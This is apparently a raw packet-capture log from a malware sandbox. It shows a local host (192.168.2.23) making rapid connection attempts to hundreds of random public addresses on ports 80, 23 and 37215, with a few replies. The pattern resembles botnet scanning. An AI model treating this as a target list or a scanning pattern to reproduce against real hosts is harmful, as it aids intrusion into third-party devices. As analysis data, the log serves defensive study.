                                                            Jan 26, 2024 15:31:07.024656057 CET5847280192.168.2.23160.104.26.79
                                                            Jan 26, 2024 15:31:07.024660110 CET5847280192.168.2.23178.171.109.143
                                                            Jan 26, 2024 15:31:07.024667025 CET5847280192.168.2.2366.225.65.147
                                                            Jan 26, 2024 15:31:07.024667025 CET5847280192.168.2.2334.26.153.94
                                                            Jan 26, 2024 15:31:07.024667025 CET5847280192.168.2.23170.99.247.165
                                                            Jan 26, 2024 15:31:07.024672985 CET5847280192.168.2.23109.231.220.56
                                                            Jan 26, 2024 15:31:07.024674892 CET5847280192.168.2.23197.199.22.132
                                                            Jan 26, 2024 15:31:07.024674892 CET5847280192.168.2.2374.104.173.246
                                                            Jan 26, 2024 15:31:07.024696112 CET5847280192.168.2.2339.119.20.146
                                                            Jan 26, 2024 15:31:07.024696112 CET5847280192.168.2.2388.218.110.197
                                                            Jan 26, 2024 15:31:07.024696112 CET5847280192.168.2.23125.139.69.89
                                                            Jan 26, 2024 15:31:07.024698019 CET5847280192.168.2.2393.229.27.206
                                                            Jan 26, 2024 15:31:07.024698019 CET5847280192.168.2.2313.143.200.19
                                                            Jan 26, 2024 15:31:07.024698019 CET5847280192.168.2.2362.237.82.135
                                                            Jan 26, 2024 15:31:07.024698019 CET5847280192.168.2.23203.113.176.52
                                                            Jan 26, 2024 15:31:07.024699926 CET5847280192.168.2.2361.173.93.132
                                                            Jan 26, 2024 15:31:07.024699926 CET5847280192.168.2.23199.224.137.123
                                                            Jan 26, 2024 15:31:07.024698019 CET5847280192.168.2.23129.113.130.151
                                                            Jan 26, 2024 15:31:07.024703979 CET5847280192.168.2.2366.247.124.42
                                                            Jan 26, 2024 15:31:07.024703979 CET5847280192.168.2.2320.122.170.125
                                                            Jan 26, 2024 15:31:07.024703979 CET5847280192.168.2.23105.106.248.170
                                                            Jan 26, 2024 15:31:07.024713039 CET5847280192.168.2.23183.152.208.15
                                                            Jan 26, 2024 15:31:07.024713039 CET5847280192.168.2.23199.197.45.200
                                                            Jan 26, 2024 15:31:07.024723053 CET5847280192.168.2.2395.127.101.157
                                                            Jan 26, 2024 15:31:07.024723053 CET5847280192.168.2.23128.251.242.231
                                                            Jan 26, 2024 15:31:07.024730921 CET5847280192.168.2.23192.201.250.240
                                                            Jan 26, 2024 15:31:07.024730921 CET5847280192.168.2.23190.15.98.84
                                                            Jan 26, 2024 15:31:07.024730921 CET5847280192.168.2.234.109.185.27
                                                            Jan 26, 2024 15:31:07.024730921 CET5847280192.168.2.23114.193.29.141
                                                            Jan 26, 2024 15:31:07.024730921 CET5847280192.168.2.23192.118.76.83
                                                            Jan 26, 2024 15:31:07.024730921 CET5847280192.168.2.23211.103.234.22
                                                            Jan 26, 2024 15:31:07.024730921 CET5847280192.168.2.2337.116.37.41
                                                            Jan 26, 2024 15:31:07.024735928 CET5847280192.168.2.2332.43.132.225
                                                            Jan 26, 2024 15:31:07.024735928 CET5847280192.168.2.23142.157.164.114
                                                            Jan 26, 2024 15:31:07.024735928 CET5847280192.168.2.2385.155.103.9
                                                            Jan 26, 2024 15:31:07.024743080 CET5847280192.168.2.23207.81.129.247
                                                            Jan 26, 2024 15:31:07.024744987 CET5847280192.168.2.23180.51.133.48
                                                            Jan 26, 2024 15:31:07.024744987 CET5847280192.168.2.2365.1.60.88
                                                            Jan 26, 2024 15:31:07.024753094 CET5847280192.168.2.238.254.65.77
                                                            Jan 26, 2024 15:31:07.024753094 CET5847280192.168.2.2378.140.191.195
                                                            Jan 26, 2024 15:31:07.024754047 CET5847280192.168.2.2325.207.77.10
                                                            Jan 26, 2024 15:31:07.024754047 CET5847280192.168.2.23199.59.152.208
                                                            Jan 26, 2024 15:31:07.024758101 CET5847280192.168.2.231.107.232.146
                                                            Jan 26, 2024 15:31:07.024760962 CET5847280192.168.2.23220.127.213.230
                                                            Jan 26, 2024 15:31:07.024764061 CET5847280192.168.2.23167.43.66.25
                                                            Jan 26, 2024 15:31:07.024766922 CET5847280192.168.2.23216.190.201.167
                                                            Jan 26, 2024 15:31:07.024766922 CET5847280192.168.2.23203.55.28.127
                                                            Jan 26, 2024 15:31:07.024766922 CET5847280192.168.2.23155.43.11.26
                                                            Jan 26, 2024 15:31:07.024770021 CET5847280192.168.2.23194.35.126.158
                                                            Jan 26, 2024 15:31:07.024770021 CET5847280192.168.2.23167.142.12.99
                                                            Jan 26, 2024 15:31:07.024771929 CET5847280192.168.2.2396.90.228.97
                                                            Jan 26, 2024 15:31:07.024781942 CET5847280192.168.2.2352.255.129.131
                                                            Jan 26, 2024 15:31:07.024794102 CET5847280192.168.2.23218.204.165.50
                                                            Jan 26, 2024 15:31:07.024796009 CET5847280192.168.2.23186.175.101.118
                                                            Jan 26, 2024 15:31:07.024852991 CET5847280192.168.2.23103.184.198.188
                                                            Jan 26, 2024 15:31:07.024852991 CET5847280192.168.2.2353.131.51.166
                                                            Jan 26, 2024 15:31:07.024853945 CET5847280192.168.2.23112.214.213.51
                                                            Jan 26, 2024 15:31:07.148684978 CET2358728217.77.179.9192.168.2.23
                                                            Jan 26, 2024 15:31:07.181188107 CET8058472190.211.150.1192.168.2.23
                                                            Jan 26, 2024 15:31:07.197618961 CET3721558984197.146.255.142192.168.2.23
                                                            Jan 26, 2024 15:31:07.212951899 CET3721558984156.237.23.222192.168.2.23
                                                            Jan 26, 2024 15:31:07.219310999 CET235872879.26.188.121192.168.2.23
                                                            Jan 26, 2024 15:31:07.229804039 CET2358728110.54.67.55192.168.2.23
                                                            Jan 26, 2024 15:31:07.229979038 CET805847245.151.29.217192.168.2.23
                                                            Jan 26, 2024 15:31:07.232090950 CET805847281.224.207.109192.168.2.23
                                                            Jan 26, 2024 15:31:07.241966009 CET2358728121.158.146.86192.168.2.23
                                                            Jan 26, 2024 15:31:07.249433041 CET8058472200.227.66.113192.168.2.23
                                                            Jan 26, 2024 15:31:07.271564007 CET8058472193.47.236.13192.168.2.23
                                                            Jan 26, 2024 15:31:07.271648884 CET5847280192.168.2.23193.47.236.13
                                                            Jan 26, 2024 15:31:07.275022984 CET8058472197.37.219.0192.168.2.23
                                                            Jan 26, 2024 15:31:07.277333975 CET8058472190.105.144.65192.168.2.23
                                                            Jan 26, 2024 15:31:07.277909994 CET5847280192.168.2.23190.105.144.65
                                                            Jan 26, 2024 15:31:07.289582968 CET372155898441.203.146.171192.168.2.23
                                                            Jan 26, 2024 15:31:07.290013075 CET3721558984156.225.55.53192.168.2.23
                                                            Jan 26, 2024 15:31:07.301754951 CET805847258.138.143.161192.168.2.23
                                                            Jan 26, 2024 15:31:07.315521002 CET8058472121.129.42.140192.168.2.23
                                                            Jan 26, 2024 15:31:07.315598965 CET5847280192.168.2.23121.129.42.140
                                                            Jan 26, 2024 15:31:07.324328899 CET3721558984197.139.192.5192.168.2.23
                                                            Jan 26, 2024 15:31:07.332134008 CET2358728102.67.70.158192.168.2.23
                                                            Jan 26, 2024 15:31:07.337248087 CET372155898441.60.67.16192.168.2.23
                                                            Jan 26, 2024 15:31:07.344453096 CET8058472211.169.254.28192.168.2.23
                                                            Jan 26, 2024 15:31:07.345495939 CET8058472110.39.8.53192.168.2.23
                                                            Jan 26, 2024 15:31:07.357506990 CET3721558984156.253.94.65192.168.2.23
                                                            Jan 26, 2024 15:31:07.373820066 CET8058472114.115.178.75192.168.2.23
                                                            Jan 26, 2024 15:31:07.373902082 CET5847280192.168.2.23114.115.178.75
                                                            Jan 26, 2024 15:31:07.957451105 CET5872823192.168.2.23137.47.233.194
                                                            Jan 26, 2024 15:31:07.957467079 CET5872823192.168.2.23204.218.25.42
                                                            Jan 26, 2024 15:31:07.957474947 CET5872823192.168.2.2396.104.42.202
                                                            Jan 26, 2024 15:31:07.957474947 CET5872823192.168.2.2382.221.6.180
                                                            Jan 26, 2024 15:31:07.957479000 CET5872823192.168.2.23159.232.18.16
                                                            Jan 26, 2024 15:31:07.957479954 CET5872823192.168.2.23160.135.90.214
                                                            Jan 26, 2024 15:31:07.957484007 CET5872823192.168.2.23162.133.149.91
                                                            Jan 26, 2024 15:31:07.957494020 CET5872823192.168.2.2331.161.76.137
                                                            Jan 26, 2024 15:31:07.957496881 CET5872823192.168.2.23102.104.79.126
                                                            Jan 26, 2024 15:31:07.957494020 CET5872823192.168.2.2383.114.143.202
                                                            Jan 26, 2024 15:31:07.957496881 CET5872823192.168.2.23186.28.130.5
                                                            Jan 26, 2024 15:31:07.957499981 CET5872823192.168.2.2320.248.207.175
                                                            Jan 26, 2024 15:31:07.957496881 CET5872823192.168.2.2317.153.135.130
                                                            Jan 26, 2024 15:31:07.957499981 CET5872823192.168.2.2389.29.221.12
                                                            Jan 26, 2024 15:31:07.957499981 CET5872823192.168.2.23136.148.159.32
                                                            Jan 26, 2024 15:31:07.957499981 CET5872823192.168.2.23178.187.158.124
                                                            Jan 26, 2024 15:31:07.957521915 CET5872823192.168.2.23163.43.195.212
                                                            Jan 26, 2024 15:31:07.957523108 CET5872823192.168.2.238.2.146.132
                                                            Jan 26, 2024 15:31:07.957526922 CET5872823192.168.2.23108.1.201.88
                                                            Jan 26, 2024 15:31:07.957530022 CET5872823192.168.2.23207.74.32.134
                                                            Jan 26, 2024 15:31:07.957530975 CET5872823192.168.2.2331.68.160.79
                                                            Jan 26, 2024 15:31:07.957534075 CET5872823192.168.2.2391.38.88.36
                                                            Jan 26, 2024 15:31:07.957541943 CET5872823192.168.2.2371.246.240.197
                                                            Jan 26, 2024 15:31:07.957545996 CET5872823192.168.2.23126.85.105.209
                                                            Jan 26, 2024 15:31:07.957545996 CET5872823192.168.2.23135.157.50.61
                                                            Jan 26, 2024 15:31:07.957556009 CET5872823192.168.2.2314.237.219.96
                                                            Jan 26, 2024 15:31:07.957556009 CET5872823192.168.2.2344.12.29.81
                                                            Jan 26, 2024 15:31:07.957559109 CET5872823192.168.2.23137.154.187.63
                                                            Jan 26, 2024 15:31:07.957560062 CET5872823192.168.2.2386.4.159.0
                                                            Jan 26, 2024 15:31:07.957560062 CET5872823192.168.2.2372.247.158.123
                                                            Jan 26, 2024 15:31:07.957559109 CET5872823192.168.2.23110.178.221.77
                                                            Jan 26, 2024 15:31:07.957560062 CET5872823192.168.2.2382.55.165.7
                                                            Jan 26, 2024 15:31:07.957559109 CET5872823192.168.2.2366.40.42.147
                                                            Jan 26, 2024 15:31:07.957564116 CET5872823192.168.2.23174.239.102.67
                                                            Jan 26, 2024 15:31:07.957560062 CET5872823192.168.2.2372.51.17.7
                                                            Jan 26, 2024 15:31:07.957564116 CET5872823192.168.2.23140.32.26.211
                                                            Jan 26, 2024 15:31:07.957565069 CET5872823192.168.2.23217.161.176.90
                                                            Jan 26, 2024 15:31:07.957565069 CET5872823192.168.2.2357.91.76.204
                                                            Jan 26, 2024 15:31:07.957565069 CET5872823192.168.2.23138.34.206.244
                                                            Jan 26, 2024 15:31:07.957582951 CET5872823192.168.2.23115.122.191.81
                                                            Jan 26, 2024 15:31:07.957582951 CET5872823192.168.2.2319.254.214.221
                                                            Jan 26, 2024 15:31:07.957583904 CET5872823192.168.2.23104.76.79.142
                                                            Jan 26, 2024 15:31:07.957587957 CET5872823192.168.2.239.68.99.114
                                                            Jan 26, 2024 15:31:07.957587957 CET5872823192.168.2.23199.119.142.239
                                                            Jan 26, 2024 15:31:07.957595110 CET5872823192.168.2.23126.131.73.218
                                                            Jan 26, 2024 15:31:07.957595110 CET5872823192.168.2.2388.50.32.68
                                                            Jan 26, 2024 15:31:07.957595110 CET5872823192.168.2.2345.79.1.4
                                                            Jan 26, 2024 15:31:07.957597971 CET5872823192.168.2.23112.19.160.179
                                                            Jan 26, 2024 15:31:07.957598925 CET5872823192.168.2.23108.95.151.238
                                                            Jan 26, 2024 15:31:07.957598925 CET5872823192.168.2.23157.28.250.251
                                                            Jan 26, 2024 15:31:07.957604885 CET5872823192.168.2.23188.71.228.223
                                                            Jan 26, 2024 15:31:07.957607985 CET5872823192.168.2.23154.167.50.28
                                                            Jan 26, 2024 15:31:07.957617998 CET5872823192.168.2.2383.34.100.47
                                                            Jan 26, 2024 15:31:07.957617998 CET5872823192.168.2.23143.248.47.161
                                                            Jan 26, 2024 15:31:07.957619905 CET5872823192.168.2.23184.211.102.39
                                                            Jan 26, 2024 15:31:07.957623959 CET5872823192.168.2.2342.174.89.230
                                                            Jan 26, 2024 15:31:07.957623959 CET5872823192.168.2.2345.76.235.55
                                                            Jan 26, 2024 15:31:07.957628012 CET5872823192.168.2.23143.230.251.74
                                                            Jan 26, 2024 15:31:07.957638025 CET5872823192.168.2.2324.55.178.234
                                                            Jan 26, 2024 15:31:07.957639933 CET5872823192.168.2.23205.32.46.26
                                                            Jan 26, 2024 15:31:07.957643986 CET5872823192.168.2.2399.144.139.236
                                                            Jan 26, 2024 15:31:07.957643986 CET5872823192.168.2.2334.4.97.171
                                                            Jan 26, 2024 15:31:07.957647085 CET5872823192.168.2.23170.164.90.127
                                                            Jan 26, 2024 15:31:07.957647085 CET5872823192.168.2.2370.135.107.47
                                                            Jan 26, 2024 15:31:07.957648039 CET5872823192.168.2.2374.245.171.10
                                                            Jan 26, 2024 15:31:07.957648993 CET5872823192.168.2.23207.76.209.219
                                                            Jan 26, 2024 15:31:07.957648993 CET5872823192.168.2.23213.234.203.91
                                                            Jan 26, 2024 15:31:07.957658052 CET5872823192.168.2.235.161.202.227
                                                            Jan 26, 2024 15:31:07.957669020 CET5872823192.168.2.2369.64.188.226
                                                            Jan 26, 2024 15:31:07.957672119 CET5872823192.168.2.23168.205.42.135
                                                            Jan 26, 2024 15:31:07.957679987 CET5872823192.168.2.23200.181.252.223
                                                            Jan 26, 2024 15:31:07.957683086 CET5872823192.168.2.23102.94.32.39
                                                            Jan 26, 2024 15:31:07.957683086 CET5872823192.168.2.23220.6.32.227
                                                            Jan 26, 2024 15:31:07.957683086 CET5872823192.168.2.2357.8.164.184
                                                            Jan 26, 2024 15:31:07.957684040 CET5872823192.168.2.2384.131.230.41
                                                            Jan 26, 2024 15:31:07.957693100 CET5872823192.168.2.23101.85.92.80
                                                            Jan 26, 2024 15:31:07.957695961 CET5872823192.168.2.23213.238.90.194
                                                            Jan 26, 2024 15:31:07.957696915 CET5872823192.168.2.23203.211.19.229
                                                            Jan 26, 2024 15:31:07.957695961 CET5872823192.168.2.23120.20.231.73
                                                            Jan 26, 2024 15:31:07.957696915 CET5872823192.168.2.2380.228.19.19
                                                            Jan 26, 2024 15:31:07.957705021 CET5872823192.168.2.23166.147.242.159
                                                            Jan 26, 2024 15:31:07.957705021 CET5872823192.168.2.23179.40.20.82
                                                            Jan 26, 2024 15:31:07.957705021 CET5872823192.168.2.23112.2.195.176
                                                            Jan 26, 2024 15:31:07.957705975 CET5872823192.168.2.23110.96.171.66
                                                            Jan 26, 2024 15:31:07.957719088 CET5872823192.168.2.23198.133.170.69
                                                            Jan 26, 2024 15:31:07.957719088 CET5872823192.168.2.2382.120.1.27
                                                            Jan 26, 2024 15:31:07.957725048 CET5872823192.168.2.23220.112.189.240
                                                            Jan 26, 2024 15:31:07.957730055 CET5872823192.168.2.2392.38.41.163
                                                            Jan 26, 2024 15:31:07.957730055 CET5872823192.168.2.23166.94.76.136
                                                            Jan 26, 2024 15:31:07.957740068 CET5872823192.168.2.2366.45.11.201
                                                            Jan 26, 2024 15:31:07.957740068 CET5872823192.168.2.2370.224.20.103
                                                            Jan 26, 2024 15:31:07.957740068 CET5872823192.168.2.2366.166.227.121
                                                            Jan 26, 2024 15:31:07.957740068 CET5872823192.168.2.23222.2.28.99
                                                            Jan 26, 2024 15:31:07.957745075 CET5872823192.168.2.2366.75.22.23
                                                            Jan 26, 2024 15:31:07.957762003 CET5872823192.168.2.23176.190.33.97
                                                            Jan 26, 2024 15:31:07.957762957 CET5872823192.168.2.232.35.23.174
                                                            Jan 26, 2024 15:31:07.957766056 CET5872823192.168.2.2389.210.198.143
                                                            Jan 26, 2024 15:31:07.957766056 CET5872823192.168.2.2381.63.213.75
                                                            Jan 26, 2024 15:31:07.957766056 CET5872823192.168.2.2376.177.113.98
                                                            Jan 26, 2024 15:31:07.957767963 CET5872823192.168.2.23149.61.48.94
                                                            Jan 26, 2024 15:31:07.957772017 CET5872823192.168.2.23175.115.211.17
                                                            Jan 26, 2024 15:31:07.957787991 CET5872823192.168.2.2387.108.177.89
                                                            Jan 26, 2024 15:31:07.957788944 CET5872823192.168.2.23143.164.115.227
                                                            Jan 26, 2024 15:31:07.957794905 CET5872823192.168.2.23182.136.235.159
                                                            Jan 26, 2024 15:31:07.957794905 CET5872823192.168.2.2341.226.1.70
                                                            Jan 26, 2024 15:31:07.957797050 CET5872823192.168.2.23140.121.69.95
                                                            Jan 26, 2024 15:31:07.957798004 CET5872823192.168.2.2399.68.102.171
                                                            Jan 26, 2024 15:31:07.957804918 CET5872823192.168.2.2390.40.233.38
                                                            Jan 26, 2024 15:31:07.957804918 CET5872823192.168.2.2337.114.73.1
                                                            Jan 26, 2024 15:31:07.957808971 CET5872823192.168.2.23184.58.239.158
                                                            Jan 26, 2024 15:31:07.957813025 CET5872823192.168.2.23146.153.35.219
                                                            Jan 26, 2024 15:31:07.957817078 CET5872823192.168.2.23165.60.89.81
                                                            Jan 26, 2024 15:31:07.957824945 CET5872823192.168.2.23189.193.13.27
                                                            Jan 26, 2024 15:31:07.957824945 CET5872823192.168.2.23142.248.143.18
                                                            Jan 26, 2024 15:31:07.957824945 CET5872823192.168.2.23147.189.227.21
                                                            Jan 26, 2024 15:31:07.957829952 CET5872823192.168.2.23125.9.183.179
                                                            Jan 26, 2024 15:31:07.957829952 CET5872823192.168.2.23206.169.91.166
                                                            Jan 26, 2024 15:31:07.957834959 CET5872823192.168.2.23115.136.200.146
                                                            Jan 26, 2024 15:31:07.957834959 CET5872823192.168.2.2339.228.254.159
                                                            Jan 26, 2024 15:31:07.957853079 CET5872823192.168.2.23112.222.77.78
                                                            Jan 26, 2024 15:31:07.957853079 CET5872823192.168.2.2374.106.92.111
                                                            Jan 26, 2024 15:31:07.957853079 CET5872823192.168.2.23176.161.240.121
                                                            Jan 26, 2024 15:31:07.957854033 CET5872823192.168.2.23125.113.7.174
                                                            Jan 26, 2024 15:31:07.957859993 CET5872823192.168.2.23172.43.68.41
                                                            Jan 26, 2024 15:31:07.957860947 CET5872823192.168.2.23133.30.16.87
                                                            Jan 26, 2024 15:31:07.957863092 CET5872823192.168.2.23190.81.24.60
                                                            Jan 26, 2024 15:31:07.957863092 CET5872823192.168.2.2395.249.69.13
                                                            Jan 26, 2024 15:31:07.957869053 CET5872823192.168.2.23109.91.251.252
                                                            Jan 26, 2024 15:31:07.957869053 CET5872823192.168.2.23208.52.128.170
                                                            Jan 26, 2024 15:31:07.957876921 CET5872823192.168.2.23126.76.99.100
                                                            Jan 26, 2024 15:31:07.957879066 CET5872823192.168.2.23110.228.78.255
                                                            Jan 26, 2024 15:31:07.957880974 CET5872823192.168.2.23104.170.188.187
                                                            Jan 26, 2024 15:31:07.957899094 CET5872823192.168.2.2399.217.218.254
                                                            Jan 26, 2024 15:31:07.957899094 CET5872823192.168.2.2323.66.193.73
                                                            Jan 26, 2024 15:31:07.957901955 CET5872823192.168.2.2376.34.76.199
                                                            Jan 26, 2024 15:31:07.957902908 CET5872823192.168.2.23193.35.33.188
                                                            Jan 26, 2024 15:31:07.957902908 CET5872823192.168.2.2396.141.174.139
                                                            Jan 26, 2024 15:31:07.957902908 CET5872823192.168.2.23114.17.179.245
                                                            Jan 26, 2024 15:31:07.957901955 CET5872823192.168.2.23150.149.131.153
                                                            Jan 26, 2024 15:31:07.957906961 CET5872823192.168.2.2372.114.13.2
                                                            Jan 26, 2024 15:31:07.957904100 CET5872823192.168.2.23136.242.159.5
                                                            Jan 26, 2024 15:31:07.957901955 CET5872823192.168.2.23164.186.167.215
                                                            Jan 26, 2024 15:31:07.957902908 CET5872823192.168.2.2319.220.246.151
                                                            Jan 26, 2024 15:31:07.957904100 CET5872823192.168.2.2374.180.103.227
                                                            Jan 26, 2024 15:31:07.957906961 CET5872823192.168.2.23179.192.73.78
                                                            Jan 26, 2024 15:31:07.957904100 CET5872823192.168.2.23121.174.160.242
                                                            Jan 26, 2024 15:31:07.957902908 CET5872823192.168.2.23202.201.31.106
                                                            Jan 26, 2024 15:31:07.957904100 CET5872823192.168.2.2339.87.90.209
                                                            Jan 26, 2024 15:31:07.957906961 CET5872823192.168.2.238.251.129.152
                                                            Jan 26, 2024 15:31:07.957921982 CET5872823192.168.2.23143.243.106.111
                                                            Jan 26, 2024 15:31:07.957921982 CET5872823192.168.2.2360.33.170.0
                                                            Jan 26, 2024 15:31:07.957921982 CET5872823192.168.2.23175.38.23.35
                                                            Jan 26, 2024 15:31:07.957927942 CET5872823192.168.2.23162.8.79.181
                                                            Jan 26, 2024 15:31:07.957927942 CET5872823192.168.2.23114.208.252.94
                                                            Jan 26, 2024 15:31:07.957933903 CET5872823192.168.2.2317.77.7.137
                                                            Jan 26, 2024 15:31:07.957935095 CET5872823192.168.2.23206.9.36.37
                                                            Jan 26, 2024 15:31:07.957950115 CET5872823192.168.2.23114.22.199.56
                                                            Jan 26, 2024 15:31:07.957953930 CET5872823192.168.2.23159.208.29.199
                                                            Jan 26, 2024 15:31:07.957953930 CET5872823192.168.2.2363.198.214.86
                                                            Jan 26, 2024 15:31:07.957953930 CET5872823192.168.2.2361.53.175.132
                                                            Jan 26, 2024 15:31:07.957959890 CET5872823192.168.2.23217.175.182.253
                                                            Jan 26, 2024 15:31:07.957971096 CET5872823192.168.2.23100.197.162.54
                                                            Jan 26, 2024 15:31:07.957971096 CET5872823192.168.2.2373.14.80.229
                                                            Jan 26, 2024 15:31:07.957974911 CET5872823192.168.2.2389.105.170.214
                                                            Jan 26, 2024 15:31:07.957974911 CET5872823192.168.2.23133.139.228.110
                                                            Jan 26, 2024 15:31:07.957974911 CET5872823192.168.2.23111.106.133.35
                                                            Jan 26, 2024 15:31:07.957977057 CET5872823192.168.2.2331.129.85.0
                                                            Jan 26, 2024 15:31:07.957974911 CET5872823192.168.2.2317.249.116.201
                                                            Jan 26, 2024 15:31:07.957977057 CET5872823192.168.2.23201.160.215.233
                                                            Jan 26, 2024 15:31:07.957978964 CET5872823192.168.2.2394.170.158.145
                                                            Jan 26, 2024 15:31:07.957974911 CET5872823192.168.2.23151.113.96.206
                                                            Jan 26, 2024 15:31:07.957977057 CET5872823192.168.2.23167.27.121.236
                                                            Jan 26, 2024 15:31:07.957978964 CET5872823192.168.2.23124.20.190.184
                                                            Jan 26, 2024 15:31:07.957977057 CET5872823192.168.2.23184.192.137.237
                                                            Jan 26, 2024 15:31:07.957983017 CET5872823192.168.2.23154.133.205.35
                                                            Jan 26, 2024 15:31:07.957978964 CET5872823192.168.2.2376.81.199.151
                                                            Jan 26, 2024 15:31:07.957979918 CET5872823192.168.2.23207.8.149.111
                                                            Jan 26, 2024 15:31:07.957978964 CET5872823192.168.2.23110.114.75.19
                                                            Jan 26, 2024 15:31:07.957978964 CET5872823192.168.2.23121.65.159.81
                                                            Jan 26, 2024 15:31:07.957978964 CET5872823192.168.2.23162.32.0.7
                                                            Jan 26, 2024 15:31:07.957978964 CET5872823192.168.2.2393.235.245.49
                                                            Jan 26, 2024 15:31:07.957978964 CET5872823192.168.2.23197.44.231.11
                                                            Jan 26, 2024 15:31:07.957987070 CET5872823192.168.2.23201.47.158.60
                                                            Jan 26, 2024 15:31:07.957988024 CET5872823192.168.2.23142.123.247.109
                                                            Jan 26, 2024 15:31:07.957987070 CET5872823192.168.2.23190.138.13.200
                                                            Jan 26, 2024 15:31:07.957988024 CET5872823192.168.2.23123.92.236.224
                                                            Jan 26, 2024 15:31:07.957989931 CET5872823192.168.2.2377.53.106.185
                                                            Jan 26, 2024 15:31:07.957988024 CET5872823192.168.2.23131.215.83.241
                                                            Jan 26, 2024 15:31:07.957988024 CET5872823192.168.2.2383.86.127.183
                                                            Jan 26, 2024 15:31:07.958003044 CET5872823192.168.2.2320.47.235.48
                                                            Jan 26, 2024 15:31:07.958003044 CET5872823192.168.2.23137.72.20.252
                                                            Jan 26, 2024 15:31:07.958003044 CET5872823192.168.2.23188.77.234.109
                                                            Jan 26, 2024 15:31:07.958003044 CET5872823192.168.2.23153.139.220.107
                                                            Jan 26, 2024 15:31:07.958013058 CET5872823192.168.2.23176.251.179.110
                                                            Jan 26, 2024 15:31:07.958014965 CET5872823192.168.2.23108.44.144.20
                                                            Jan 26, 2024 15:31:07.958014965 CET5872823192.168.2.23156.201.124.123
                                                            Jan 26, 2024 15:31:07.958025932 CET5872823192.168.2.23124.187.241.146
                                                            Jan 26, 2024 15:31:07.958029985 CET5872823192.168.2.23152.126.176.117
                                                            Jan 26, 2024 15:31:07.958030939 CET5872823192.168.2.23159.249.244.225
                                                            Jan 26, 2024 15:31:07.958029985 CET5872823192.168.2.2386.107.167.12
                                                            Jan 26, 2024 15:31:07.958029985 CET5872823192.168.2.23208.242.65.195
                                                            Jan 26, 2024 15:31:07.958029985 CET5872823192.168.2.2383.194.25.172
                                                            Jan 26, 2024 15:31:07.958039999 CET5872823192.168.2.23191.61.115.134
                                                            Jan 26, 2024 15:31:07.958040953 CET5872823192.168.2.23108.156.185.158
                                                            Jan 26, 2024 15:31:07.958039999 CET5872823192.168.2.231.214.186.29
                                                            Jan 26, 2024 15:31:07.958040953 CET5872823192.168.2.2342.104.210.237
                                                            Jan 26, 2024 15:31:07.958040953 CET5872823192.168.2.23163.239.132.22
                                                            Jan 26, 2024 15:31:07.958040953 CET5872823192.168.2.2367.175.225.20
                                                            Jan 26, 2024 15:31:07.958048105 CET5872823192.168.2.2347.247.170.170
                                                            Jan 26, 2024 15:31:07.958048105 CET5872823192.168.2.2398.50.121.219
                                                            Jan 26, 2024 15:31:07.958048105 CET5872823192.168.2.23187.161.112.187
                                                            Jan 26, 2024 15:31:07.958048105 CET5872823192.168.2.23169.65.178.38
                                                            Jan 26, 2024 15:31:07.958050013 CET5872823192.168.2.2320.51.124.124
                                                            Jan 26, 2024 15:31:07.958048105 CET5872823192.168.2.2375.245.250.159
                                                            Jan 26, 2024 15:31:07.958048105 CET5872823192.168.2.2374.164.1.214
                                                            Jan 26, 2024 15:31:07.958053112 CET5872823192.168.2.23203.254.217.177
                                                            Jan 26, 2024 15:31:07.958053112 CET5872823192.168.2.2334.149.89.150
                                                            Jan 26, 2024 15:31:07.958062887 CET5872823192.168.2.232.225.226.85
                                                            Jan 26, 2024 15:31:07.958066940 CET5872823192.168.2.2368.62.74.185
                                                            Jan 26, 2024 15:31:07.958079100 CET5872823192.168.2.23126.16.25.99
                                                            Jan 26, 2024 15:31:07.958080053 CET5872823192.168.2.23104.28.100.36
                                                            Jan 26, 2024 15:31:07.958081961 CET5872823192.168.2.23124.100.237.82
                                                            Jan 26, 2024 15:31:07.958086014 CET5872823192.168.2.23216.119.48.224
                                                            Jan 26, 2024 15:31:07.958090067 CET5872823192.168.2.23108.64.214.82
                                                            Jan 26, 2024 15:31:07.958091974 CET5872823192.168.2.23103.221.34.14
                                                            Jan 26, 2024 15:31:07.958096027 CET5872823192.168.2.23174.197.190.82
                                                            Jan 26, 2024 15:31:07.958098888 CET5872823192.168.2.23192.118.131.183
                                                            Jan 26, 2024 15:31:07.958100080 CET5872823192.168.2.2374.3.38.67
                                                            Jan 26, 2024 15:31:07.958100080 CET5872823192.168.2.23207.216.176.51
                                                            Jan 26, 2024 15:31:07.958100080 CET5872823192.168.2.23220.124.155.185
                                                            Jan 26, 2024 15:31:07.958113909 CET5872823192.168.2.23137.216.124.168
                                                            Jan 26, 2024 15:31:07.958116055 CET5872823192.168.2.2320.242.222.33
                                                            Jan 26, 2024 15:31:07.958117962 CET5872823192.168.2.23156.227.146.169
                                                            Jan 26, 2024 15:31:07.958118916 CET5872823192.168.2.2381.82.250.86
                                                            Jan 26, 2024 15:31:07.958117962 CET5872823192.168.2.23132.240.215.181
                                                            Jan 26, 2024 15:31:07.958122969 CET5872823192.168.2.2347.184.79.21
                                                            Jan 26, 2024 15:31:07.958131075 CET5872823192.168.2.2392.171.59.205
                                                            Jan 26, 2024 15:31:07.958132982 CET5872823192.168.2.23126.156.143.74
                                                            Jan 26, 2024 15:31:07.958137035 CET5872823192.168.2.23164.171.217.247
                                                            Jan 26, 2024 15:31:07.958139896 CET5872823192.168.2.2332.100.251.252
                                                            Jan 26, 2024 15:31:07.958139896 CET5872823192.168.2.23178.231.250.27
                                                            Jan 26, 2024 15:31:07.958153009 CET5872823192.168.2.2344.109.22.211
                                                            Jan 26, 2024 15:31:07.958154917 CET5872823192.168.2.23220.24.23.136
                                                            Jan 26, 2024 15:31:07.958164930 CET5872823192.168.2.23122.202.8.113
                                                            Jan 26, 2024 15:31:07.958165884 CET5872823192.168.2.23112.53.232.90
                                                            Jan 26, 2024 15:31:07.958165884 CET5872823192.168.2.23110.144.106.110
                                                            Jan 26, 2024 15:31:07.958165884 CET5872823192.168.2.23212.206.169.25
                                                            Jan 26, 2024 15:31:07.958165884 CET5872823192.168.2.23109.130.11.147
                                                            Jan 26, 2024 15:31:07.958169937 CET5872823192.168.2.2377.156.113.143
                                                            Jan 26, 2024 15:31:07.958173037 CET5872823192.168.2.238.225.39.109
                                                            Jan 26, 2024 15:31:07.958173990 CET5872823192.168.2.2380.245.6.49
                                                            Jan 26, 2024 15:31:07.958192110 CET5872823192.168.2.23134.198.109.157
                                                            Jan 26, 2024 15:31:07.958192110 CET5872823192.168.2.23186.10.174.29
                                                            Jan 26, 2024 15:31:07.958192110 CET5872823192.168.2.23179.206.164.213
                                                            Jan 26, 2024 15:31:07.958197117 CET5872823192.168.2.2352.42.109.115
                                                            Jan 26, 2024 15:31:07.958201885 CET5872823192.168.2.23160.132.3.18
